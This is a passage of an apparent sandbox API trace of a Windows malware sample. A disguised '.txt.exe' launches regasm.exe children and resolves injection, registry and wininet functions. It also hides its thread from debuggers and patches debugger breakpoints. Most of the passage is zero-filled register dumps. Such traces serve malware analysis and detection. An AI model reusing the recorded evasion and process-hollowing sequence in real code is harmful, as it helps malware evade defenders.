[266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0108.376] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffff) returned 0x0 [0129.482] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0129.483] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "2" image_name = "regasm.exe" filename = "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\regasm.exe" page_root = "0x3321b000" os_pid = "0x970" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x980" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0xb70 Process: id = "3" image_name = "regasm.exe" filename = "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\regasm.exe" page_root = "0x33522000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x980" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x9f0 [0108.529] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x74fb8*=0x77141000, NumberOfBytesToProtect=0x74fb0, NewAccessProtection=0x40, OldAccessProtection=0x74fa8 | out: BaseAddress=0x74fb8*=0x77141000, NumberOfBytesToProtect=0x74fb0, OldAccessProtection=0x74fa8*=0x20) returned 0x0 [0108.586] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0108.586] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.586] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0108.587] LoadLibraryA (lpLibFileName="user32") returned 0x76780000 [0108.637] GetProcAddress (hModule=0x76780000, lpProcName="EnumWindows") returned 0x7679d1cf [0108.637] EnumWindows (lpEnumFunc=0x703b4, lParam=0x2dfb80) returned 1 [0108.650] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.651] GetProcAddress (hModule=0x77320000, lpProcName="NtProtectVirtualMemory") returned 0x77340028 [0108.657] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.658] GetProcAddress (hModule=0x77320000, lpProcName="DbgBreakPoint") returned 0x7733000c [0108.658] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.658] GetProcAddress (hModule=0x77320000, lpProcName="DbgUiRemoteBreakin") returned 0x773bf7ea [0108.658] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2dfb68*=0x77330000, NumberOfBytesToProtect=0x2dfb6c, NewAccessProtection=0x40, OldAccessProtection=0x2dfb70 | out: BaseAddress=0x2dfb68*=0x77330000, NumberOfBytesToProtect=0x2dfb6c, OldAccessProtection=0x2dfb70*=0x20) returned 0x0 [0108.691] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2dfb68*=0x77330000, NumberOfBytesToProtect=0x2dfb6c, NewAccessProtection=0x20, OldAccessProtection=0x2dfb70 | out: BaseAddress=0x2dfb68*=0x77330000, NumberOfBytesToProtect=0x2dfb6c, OldAccessProtection=0x2dfb70*=0x40) returned 0x0 [0108.746] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.746] GetProcAddress (hModule=0x77320000, lpProcName="NtSetInformationThread") returned 0x7733f99c [0108.752] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0108.752] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.753] GetProcAddress (hModule=0x77320000, lpProcName="NtAllocateVirtualMemory") returned 0x7733fab0 [0108.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x2dfbec*=0x0, ZeroBits=0x0, RegionSize=0x2dfbe8*=0x1c200000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x2dfbec*=0x2540000, RegionSize=0x2dfbe8*=0x1c200000) returned 0x0 [0108.872] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.873] GetProcAddress (hModule=0x77320000, lpProcName="NtGetContextThread") returned 0x77340c20 [0108.873] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.873] GetProcAddress (hModule=0x77320000, lpProcName="NtSetContextThread") returned 0x77341910 [0108.873] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.873] GetProcAddress (hModule=0x77320000, lpProcName="NtWriteVirtualMemory") returned 0x7733fe04 [0108.873] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.874] GetProcAddress (hModule=0x77320000, lpProcName="NtCreateSection") returned 0x7733ff94 [0108.874] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.874] GetProcAddress (hModule=0x77320000, lpProcName="NtMapViewOfSection") returned 0x7733fc40 [0108.874] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.874] GetProcAddress (hModule=0x77320000, lpProcName="NtOpenFile") returned 0x7733fd54 [0108.874] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.875] GetProcAddress (hModule=0x77320000, lpProcName="NtClose") returned 0x7733f9d0 [0108.875] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0108.875] GetProcAddress (hModule=0x77320000, lpProcName="NtResumeThread") returned 0x77340058 [0108.875] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.875] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessInternalW") returned 0x76e33bf3 [0108.875] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.876] GetProcAddress (hModule=0x76e10000, lpProcName="GetLongPathNameW") returned 0x76e2a315 [0108.876] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.876] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0108.876] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.876] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0108.876] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.876] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0108.876] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.877] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateThread") returned 0x76e27a2f [0108.877] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.877] GetProcAddress (hModule=0x76e10000, lpProcName="AddVectoredExceptionHandler") returned 0x7739742b [0108.877] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.877] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0108.877] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.878] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0108.878] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.878] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0108.878] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.878] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSize") returned 0x76e2196e [0108.878] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0108.879] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0108.879] LoadLibraryA (lpLibFileName="shell32") returned 0x75670000 [0108.888] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteW") returned 0x75683c71 [0108.888] LoadLibraryA (lpLibFileName="shell32") returned 0x75670000 [0108.888] GetProcAddress (hModule=0x75670000, lpProcName="SHCreateDirectoryExW") returned 0x7571db61 [0108.888] LoadLibraryA (lpLibFileName="advapi32") returned 0x754b0000 [0108.889] GetProcAddress (hModule=0x754b0000, lpProcName="RegCreateKeyExA") returned 0x754c1469 [0108.889] LoadLibraryA (lpLibFileName="advapi32") returned 0x754b0000 [0108.889] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExA") returned 0x754c14b3 [0108.897] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x75190000 [0111.024] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0111.025] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x75190000 [0111.025] GetProcAddress (hModule=0x75190000, lpProcName="InternetSetOptionA") returned 0x751a75e8 [0111.025] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x75190000 [0111.026] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0111.026] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x75190000 [0111.026] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0111.026] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x75190000 [0111.027] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0111.031] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0113.427] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, 